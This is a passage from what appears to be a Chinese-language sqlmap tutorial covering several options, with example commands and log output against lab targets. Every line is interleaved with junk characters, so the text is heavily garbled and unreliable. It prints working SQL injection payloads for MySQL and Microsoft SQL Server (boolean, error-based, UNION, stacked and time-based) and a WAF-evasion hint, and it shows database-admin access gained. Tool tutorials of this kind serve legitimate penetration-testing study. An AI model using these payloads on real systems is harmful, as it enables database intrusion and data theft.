[xx:xx:23] [INFO] heuristics detected web page charset 'ascii' 7 c/ W. n4 N0 n+ M" Z[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection * R; ^8 g, _3 \& B[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'+ O& M6 S8 Y" h7 p( s3 M3 s: D
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'( {% `2 F; j1 h% S3 {! B1 S
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'' u6 ?( j M; y6 t2 N3 A) f
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'2 M% ^1 z9 U7 W5 e. t- t
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'; W2 V4 c/ r E
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)' : g5 g# s* C& s% Z% R" A[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)' 7 }9 r/ L- C8 _" X( x7 Z6 R[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'* z p9 ~+ j: d' m
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)' 7 y4 B9 {/ X1 @[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'" Z9 k0 a8 E2 ?. G& P M8 s
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'! }# z! I' V' @0 ?. A
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)' ! w/ \8 I% N; w+ F, ][xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)' " T3 l! J& G5 ?% `+ O# z' R. a[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'/ a4 P, p, L1 S* }# B
[xx:xx:23] [DEBUG] page not found (404) " G4 M6 f5 H" N% `# x% B, E* X[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)' 3 q L2 r" P+ A7 u7 l! W& S9 u[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'8 c3 k, z) j ~' X. U/ F( }. n
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'4 b& S- \ h1 B- Y9 T+ a$ P8 ~
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)' : c, C w7 s$ Q5 Z* u! n6 f[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'3 W, b T; D$ i7 |
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)' - A9 j3 ~1 M7 x5 r- V5 Y[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')8 Z& P( O m% O% b; O4 W6 w8 M; M
[...] 3 K$ q* P: M" K7 k) C # O: T$ t1 s) r! R ?模仿智能手机 4 j+ m9 C4 ~8 z- I' ~, `0 z% m1 B: z1 j1 a) N0 e
参数:--mobile / [1 c# S" q- d7 e4 y% z5 e8 b6 h" S/ ]7 q& t
有时服务端只接收移动端的访问,此时可以设定一个手机的User-Agent来模仿手机登陆。/ N$ P2 o! S$ _* u
& C4 e( z; P2 O8 f5 c
例如: + u; H \3 K) w3 _7 Y7 o* H5 i6 J F8 p2 a$ O. _
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile0 p8 {7 g$ ~" g* E6 p
[...]5 W5 ~' K$ B' P; n
which smartphone do you want sqlmap to imitate through HTTP User-Agent header? ( H2 e/ Q( `4 O# Q& `' ^[1] Apple iPhone 4s (default)+ |* l' w7 Z6 j% r4 `9 u' g1 P$ c4 Y' Z
[2] BlackBerry 9900 $ h `# `+ C) t# w$ P9 a# o! h[3] Google Nexus 7 " o" \9 {# @; T( j& I0 T[4] HP iPAQ 6365( G8 c, C* L. i- m4 q3 T; P
[5] HTC Sensation6 S& a. x4 w8 R9 O8 f0 L2 U& u: F
[6] Nokia N97, I3 k! b, n4 ^
[7] Samsung Galaxy S" s* _* s j! v0 I# P7 N
> 1 * q9 S4 c. f% y[...] ' ?8 F& M* e8 d+ J) C) [6 [ 5 N$ {: {' ?& ^( X% z6 v安全的删除output目录的文件 / U# x$ P; C) Y# W , P' B0 c6 i# Z8 L参数:--purge-output : d4 n j; O' ]/ ^% r( ]) c. B . x8 U. x) Y' `7 C有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。 ( o: I3 K! U0 @9 P' O% j % ]% G$ N+ s7 H; P7 _例如: 4 c! `! q4 l. f! p5 {' D# G 8 s" M9 k( y |5 E( M! S$ python sqlmap.py --purge-output -v 3/ t% Q8 J/ ?' w* J7 v, m
[...]6 {* K+ g7 E+ h
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'... , g) V. ?9 z# p9 @[xx:xx:55] [DEBUG] changing file attributes' N. w5 y& p% y C( d# B V
[xx:xx:55] [DEBUG] writing random data to files # Q9 d0 W' C0 k$ M[xx:xx:55] [DEBUG] truncating files& X9 J2 K ^3 H4 q( @$ B3 K( ^
[xx:xx:55] [DEBUG] renaming filenames to random values $ c/ H$ f1 U% [[xx:xx:55] [DEBUG] renaming directory names to random values( b! T+ d( ^. l5 H6 H! n
[xx:xx:55] [DEBUG] deleting the whole directory tree ; w4 |; o- h8 `' f+ y[...] ! r; M. Z; \0 B* a( g/ X" |6 P7 T. [ k
启发式判断注入 1 o o1 o; D* }' d1 o' ]2 T, C# E- ?! a. `
参数:--smart- J6 K, Q2 J& z$ [. A: L' r2 @
) [9 _. y+ a" m5 a4 \) u
有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。5 q0 w _, s( {0 a4 h) ]9 X
* c* S* g' V* m例子: 1 m7 s; Q! |4 A! a. n% D& E' M/ d0 ^# m- j& D1 }
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart " f- O$ p$ e5 F; P! x5 t% D; y[...]0 N# a- f2 g) V! M2 W3 w- h0 I. j* V
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic % Z M6 A9 \9 T+ D \[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic" Y' t$ T2 {$ ^! _/ ?0 \
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable. i7 F" b% M; W- U6 B6 k
[xx:xx:14] [INFO] skipping GET parameter 'ca' 0 m: C$ K8 b: O! c+ W) X[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic4 K4 n! d. g( a# ?3 Y
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic 5 o" Q; Y( Y' ~0 O3 G ^. G1 M$ C[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable' X2 V6 ~; N8 a- i$ u
[xx:xx:14] [INFO] skipping GET parameter 'user'! y5 j' u3 G# ]) ?$ `7 h
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic) A9 v* _1 S1 e5 S1 `* c: z9 Z
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic& `. x3 @5 V) S3 j# b* z4 j n
[xx:xx:14] [INFO] GET parameter 'id' is dynamic, o7 _9 l. H* D, g
[xx:xx:14] [WARNING] reflective value(s) found and filtering out, \3 _4 @! J T3 Z' r8 J/ D
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')( H' C/ a( O$ I# B
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id', w4 ?& T- t( ]5 Z$ ~, J+ T
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y - \/ I% C( M. v% I3 W x8 d6 \do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y % M T4 o1 [! w3 o[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'/ U" o1 O" {" U, \2 e, o
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable % |, F v( K6 H K) Y5 }
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'& O K! D' w" r6 @# ~ Z' B
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 8 Q' `7 l- o0 a
[xx:xx:14] [INFO] testing 'MySQL inline queries'# W" B1 G& T0 w y
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries' 7 `1 A3 Z& ^0 H' m[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' , I! x3 ^6 k# b; ^[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'1 J* J: M) t, m
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable / E* W. y& [7 G/ T; r4 Q[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns': l: N: Z4 @& G+ M" L7 I
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found 7 Z# z* `! s7 K& ?, T[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test/ o8 l+ \* {! z5 X& Q) S
[xx:xx:24] [INFO] target URL appears to have 3 columns in query4 ^+ y6 A) S" e
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable$ }4 M# U- P1 f
[...] . k% K$ d" Q5 o; @9 e+ S ' X0 ^. A; ]+ S& C. l5 i. s* ~初级用户向导参数/ Z7 _; \; U0 Y( w1 Y; |0 w
3 f' q2 f- t5 z* f. A2 ]: b% B9 f参数:--wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。 ' k# T5 \# O& _4 ], l4 D 8 q: f: e5 K/ d" y9 K- r& c$ \$ python sqlmap.py --wizard # o9 B2 p! E1 O3 Y: w0 J 4 r4 F+ A, w( N- r% t/ A3 @! m sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool: O) g( Y" w: O! f
. K% c0 T- {7 L0 s, O! u$ z
http://sqlmap.org1 Z! E" n2 Q N& A p) E4 |1 _$ j- h
: r! v7 R$ a- |% |. h
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program: C4 |5 K8 g: W% k0 [. G& B
starting at 11:25:266 D) y6 o z I$ |8 n5 v
3 p8 S; h8 i+ x9 }! C% w" `Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=16 V+ w8 b! }. Y) G" K% r# z/ u, M
POST data (--data) [Enter for None]: * k, z; _! j- }2 F2 b& C
Injection difficulty (--level/--risk). Please choose:) k0 I9 @ t# m/ e
[1] Normal (default) 7 k2 E1 g. ?$ _8 V" H[2] Medium 5 R) N# h6 ^. Q3 G- }; P5 e[3] Hard! B- P) \/ L$ B3 u. j5 G7 F& d# E% _
> 12 T1 A0 J( k$ f$ b* n
Enumeration (--banner/--current-user/etc). Please choose: 2 H" B/ r; U1 B+ ][1] Basic (default) " M& E" b& b3 e. p[2] Smart # `+ p0 Z% i: _, i/ b3 H) }* N[3] All 5 A+ ?5 t; }0 Z) X4 Y, {* y> 1& `* O! h$ y$ _7 c x2 g& u7 @
( i+ h2 p3 K: n7 g9 i5 Xsqlmap is running, please wait..% c$ W' W; ~' q J- @5 R Q
* d# |' b' `% S: y, E8 e
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y9 w" {$ q" e+ f: h8 W4 b4 e+ G
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y5 X( Q4 A- i/ L' ~( c7 O$ [' r
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N 5 h; g5 G& J. p; B# [. N# G$ q1 m ?3 dsqlmap identified the following injection points with a total of 25 HTTP(s) requests: 8 K7 q9 G% e' n/ F- x( b3 K! t--- & S4 U3 g- f; oPlace: GET # R3 C' W* f3 d- o& UParameter: id( b6 k9 F3 |; D0 E
Type: boolean-based blind : V( F" S% o; V9 G Title: AND boolean-based blind - WHERE or HAVING clause, I8 \% H- H0 y4 L
Payload: id=1 AND 2986=2986$ [$ P+ D/ g% U. e
- ]2 x2 N8 |. j4 Z Type: error-based0 X( r2 |2 r1 ]8 z: A, i
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause! m2 d z0 ]) ~( e
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))) 1 h8 [0 }/ U6 x* K* q8 x0 p: o " M% w/ {/ d" U- {' B) P. ` Type: UNION query & S) Z# {& m: C2 P5 L N4 f Title: Generic UNION query (NULL) - 3 columns5 D5 H# v* l, S% \
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- 6 r/ w. F: D; s. U 8 W2 F* b0 a3 U% g0 x; P( ~( c. C Type: stacked queries 4 C" S5 ~8 H, v3 G& _2 ~. F( R9 |2 ~ Title: Microsoft SQL Server/Sybase stacked queries# s7 d( ?& P1 ]; w* s, V
Payload: id=1; WAITFOR DELAY '0:0:5'--& }( a; D# f" o' |+ \' V
' R8 \0 y. A* S* A6 Q7 {& b
Type: AND/OR time-based blind& ^. N# k' ?, b+ ? l& C7 U
Title: Microsoft SQL Server/Sybase time-based blind 5 w& m/ q$ S+ {( z Payload: id=1 WAITFOR DELAY '0:0:5'--+ m- q% P% h. `- j% c
1 Y; B' F' M% r- }& _: b6 q
Type: inline query & C& w0 s. W; o4 h. a+ a Title: Microsoft SQL Server/Sybase inline queries# C/ u7 S: q3 @/ `% d/ X: p
Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))# e9 q0 j% ^. b7 l+ E* \
--- $ W5 t2 U6 h) b: A+ i; w4 Vweb server operating system: Windows XP . p" _0 k+ i4 }- s9 Sweb application technology: ASP, Microsoft IIS 5.1& [1 ~ r& V7 z1 R% B1 v" q, O
back-end DBMS operating system: Windows XP Service Pack 2 2 Y$ e" m2 u! Q aback-end DBMS: Microsoft SQL Server 2005 / k8 E: x& Q+ D" ubanner: $ e9 C7 Q% q I4 c7 V' ~9 B1 G---7 {% w0 O h* {4 Q4 ^
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) * n3 z) X, G( G% V5 A% B
Oct 14 2005 00:33:37 * y t* b F# D; H0 c2 i% I+ O' Y
Copyright (c) 1988-2005 Microsoft Corporation: a. e4 I5 T9 j% o9 d r
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) 9 n3 K8 G( L9 ]+ ^/ }, n; e7 Z---/ m5 k. f. _6 E$ F, U/ V
current user: 'sa'4 y" X5 P* j. v% t* k+ M L- _
current database: 'testdb'5 t4 \9 W) Y S5 n' z" E6 [
current user is DBA: True